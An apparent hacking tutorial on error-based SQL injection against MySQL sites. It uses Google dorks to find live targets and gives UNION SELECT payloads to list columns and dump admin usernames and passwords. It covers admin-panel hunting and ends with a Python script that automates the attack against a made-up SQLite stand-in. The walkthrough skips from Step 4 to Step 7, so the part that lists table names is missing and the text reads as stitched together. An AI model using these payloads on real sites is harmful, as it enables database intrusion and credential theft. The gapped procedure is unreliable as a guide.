In this tutorial I'm going to discuss SQL Injection. SQLi is one of the most popular web application hacking methods. Using an SQL Injection attack, an unauthorized person can reach the database behind the website and extract data from it.
What can a hacker do during and after an SQLi attack?
* Bypassing logins
* Accessing secret data
* Modifying and defacing the website
* Shutting down the MySQL server
So, here we go.
Step 1: Finding Vulnerable Websites
To find candidate websites, you can use Google search with certain keywords. These search strings are often referred to as ''Google Dorks''. They only find URL patterns where a numeric parameter is handed to a script; whether the site is actually vulnerable is checked in Step 2.
Code:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Copy one of the above keywords and paste it into the Google search engine. We'll get a lot of results. We have to visit these websites one by one to check if they are vulnerable.
![[Image: 314fb9160af31558daf23d42276652cd.png]](http://i.gyazo.com/314fb9160af31558daf23d42276652cd.png)
Step 2: Checking for Vulnerability
Now let's check if the target website is vulnerable to SQLi. To test, add a single quote (') at the end of the url and hit enter.
Code:
http://www.victimsite.com/index.php?id=2'
If the page renders exactly as before or shows a generic not-found page, the quote did not surface an error. That does not prove the parameter is safe (an application can hide database errors and still be injectable, which is the blind case this tutorial doesn't cover), but the error-based method below won't get you further on that site.
If you get an error like the one shown below, the quote broke the query and the website is vulnerable.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding the number of columns:
Great, so we've found a website that is vulnerable to SQLi. Our next step is to find the number of columns the page's query selects, because the UNION SELECT in the next step has to supply exactly that many.
To do that, replace the single quote with an ''order by #'' clause.
Change the # from 1 to 2, 3, 4, 5, 6, ... until you get the ''unknown column'' error.
Code:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If ''order by 8'' errors but ''order by 7'' still worked, the query has 7 columns. In general, if the first failing number is x, the column count is x-1.
If the above method fails to work for you, add ''--'' at the end of the statement to comment out whatever the application appends after your input. Note that MySQL needs a space after ''--'' and browsers trim a trailing space from the url, so ''--+'' (the plus decodes to a space) or ''#'' (''%23'' in a url) is often what actually works.
Code:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Find the vulnerable columns:
We have successfully discovered the number of columns in the query. Let's find the columns that are reflected into the page by trying ''union select columns_sequence''.
Change the id value to a negative number, so id=-2, so that the original query returns no row and only our UNION row is displayed. Replace columns_sequence with the numbers from 1 to x-1 (the column count) separated by commas.
For example, if the number of columns is 7, then the query is as the following:
Code:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working, use this:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, the numbers that show up in the page body mark the columns whose content the page displays. Those are the ''vulnerable'' columns: whatever we put in that position of the UNION SELECT gets rendered.
From the list of table names returned by ''group_concat(table_name)'', we're going to choose the ''admin'' table.
Step 7: Finding the column names
Now we're going to replace ''group_concat(table_name)'' with ''group_concat(column_name)''
and replace ''from information_schema.tables where table_schema=database()--'' with ''from information_schema.columns where table_name=mysqlchar--''.
We have to write the table name as a MySQL CHAR() expression instead of a quoted string, because the quote character is exactly what many sites escape or filter (magic_quotes, addslashes). CHAR(97,100,109,105,110) is simply ''admin'' spelled out as ASCII codes; a hex literal such as 0x61646d696e works the same way in MySQL.
So in order to do that, we'll use the HackBar add-on for Mozilla Firefox.
Once you've installed the add-on, you'll see a toolbar that looks like the following one. If you're not able to see the HackBar, press F9.
Select SQL -> MySQL -> MySQLChar() in the HackBar.
It will ask for the string you want to convert to MySQL CHAR(). We want to convert the table name; in our case the table name is ''admin''.
Now you can see the CHAR() expression (numbers separated by commas) in the HackBar. Copy it and paste it into the url in place of ''mysqlchar''.
For example:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of columns.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password, etc.
Now replace group_concat(column_name) with group_concat(columnname1,0x3a,columnname2), where 0x3a is a colon used as a separator, and change the FROM clause to the table itself.
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays an ''unknown column'' error, try another column name from the list.
If we are lucky, it will display the data stored in those columns. For instance, the username and password columns will display the login credentials stored in the database (often as password hashes rather than plaintext).
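The whole procedure from Step 2 to Step 7 driven from a script instead of by hand, as an added example that is not part of the original tutorial. The target is a constructed stand-in: an in-memory SQLite database behind a Python function that concatenates the id parameter into the SQL string the way a vulnerable index.php?id= page does, with a hardened version beside it. SQLite replaces MySQL here (an assumption), so sqlite_master and pragma_table_info stand in for information_schema.tables and information_schema.columns, and the || operator replaces the 0x3a trick inside group_concat; the 7-column article query, the admin table and every row in it are made up to match the tutorial.

```python
"""Added example, not code from the original tutorial: Steps 2-7 automated
against a constructed stand-in target. SQLite replaces MySQL (assumption), so
sqlite_master / pragma_table_info stand in for information_schema and the
|| operator replaces MySQL's group_concat(a,0x3a,b). The 7-column article
query, the admin table and every row in it are made up to match the tutorial.
"""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT,
                      created TEXT, tags TEXT, views INTEGER);
INSERT INTO articles VALUES (2,'Hello','First post','alice','2024-01-01','news',10);
CREATE TABLE admin(admin_id INTEGER, admin_name TEXT, admin_password TEXT);
INSERT INTO admin VALUES (1,'admin','s3cret'), (2,'editor','hunter2');
""")

QUERY = "SELECT id,title,body,author,created,tags,views FROM articles WHERE id="

def render(rows):
    # The page only shows title, body and author, i.e. query columns 2, 3 and 4.
    return "\n".join(" | ".join(str(c) for c in r[1:4]) for r in rows)

def vulnerable_page(id_param):
    """The tutorial's target: string concatenation plus a leaked error message."""
    try:
        return render(db.execute(QUERY + id_param).fetchall())
    except sqlite3.Error as e:
        return "Error: " + str(e)

def safe_page(id_param):
    """Hardened form: validate the input, then bind it as a parameter."""
    if not id_param.isdigit():
        return "Not found"
    return render(db.execute(QUERY + "?", (int(id_param),)).fetchall())

# ---- attacker side: the tutorial's steps, driven from code ------------------

def is_error_based_injectable(page, id_value="2"):
    """Step 2: a stray quote that makes a database error show up in the page."""
    return page(id_value + "'").startswith("Error:")

def count_columns(page, id_value="2", limit=32):
    """Step 3: ORDER BY n works up to the column count and errors just past it."""
    n = 1
    while n <= limit and not page(f"{id_value} order by {n}--").startswith("Error:"):
        n += 1
    return n - 1

def union_payload(ncols, col=None, expr=None, tail="", id_value="2"):
    """A negative id empties the real result; column `col` carries `expr`."""
    cols = [str(i) for i in range(1, ncols + 1)]
    if col is not None:
        cols[col - 1] = expr
    return f"-{id_value} union select {','.join(cols)} {tail}--"

def find_reflected_columns(page, ncols):
    """Step 4: which of the numbered markers 1..ncols are echoed into the page."""
    out = page(union_payload(ncols))
    return [int(x) for x in out.split(" | ") if x.isdigit() and 1 <= int(x) <= ncols]

def mysql_char(s):
    """What HackBar's MySQLChar() does: spell a string as CHAR(...) so the payload
    needs no quote character. MySQL also accepts 0x61646d696e for 'admin'; SQLite
    does not treat hex literals as strings, so CHAR() is the form used here."""
    return "CHAR(" + ",".join(str(ord(c)) for c in s) + ")"

def dump(page, expr, tail, col, reflected, ncols):
    """Put `expr ... tail` into a reflected column and read the value back."""
    out = page(union_payload(ncols, col, expr, tail))
    return out.split(" | ")[reflected.index(col)]

def run_attack(page, target_table="admin"):
    """Steps 2-7 end to end; returns None when the page shows no SQL error."""
    if not is_error_based_injectable(page):
        return None
    ncols = count_columns(page)
    reflected = find_reflected_columns(page, ncols)
    col = reflected[0]
    # Table names (MySQL: group_concat(table_name) from information_schema.tables
    # where table_schema=database()).
    tables = dump(page, "group_concat(name)",
                  "from sqlite_master where type=" + mysql_char("table"),
                  col, reflected, ncols).split(",")
    # Step 7 (MySQL: group_concat(column_name) from information_schema.columns
    # where table_name=CHAR(...)).
    columns = dump(page, "group_concat(name)",
                   "from pragma_table_info(" + mysql_char(target_table) + ")",
                   col, reflected, ncols).split(",")
    # Pick the credential columns by name, as the tutorial does by eye
    # (MySQL: group_concat(admin_name,0x3a,admin_password) from admin).
    name_col = next(c for c in columns if "name" in c)
    pass_col = next(c for c in columns if "pass" in c)
    creds = dump(page, f"group_concat({name_col}||CHAR(58)||{pass_col})",
                 "from " + target_table, col, reflected, ncols)
    return {"columns": ncols, "reflected": reflected, "tables": tables,
            "target_columns": columns,
            "credentials": dict(c.split(":", 1) for c in creds.split(","))}

if __name__ == "__main__":
    print(run_attack(vulnerable_page))
    print(run_attack(safe_page))  # None: the quote never reaches the database
```

Running it prints the column count, the reflected columns, the table list, the admin table's columns and the name:password pairs for the vulnerable page, and None for the hardened page, whose bound parameter never lets the quote reach the database. The mysql_char helper produces exactly the CHAR(97,100,109,105,110) that HackBar produced for ''admin'' above.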
Step 8: Finding the admin panel
Just try to access the admin panel with urls like below.
Code:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
If you're lucky, you'll find the admin page using the above urls. You can use an admin-finder tool as well.
This was everything, I hope you've learnt something from it and that you enjoyed reading it. If I explained something wrong, please correct me in the comments.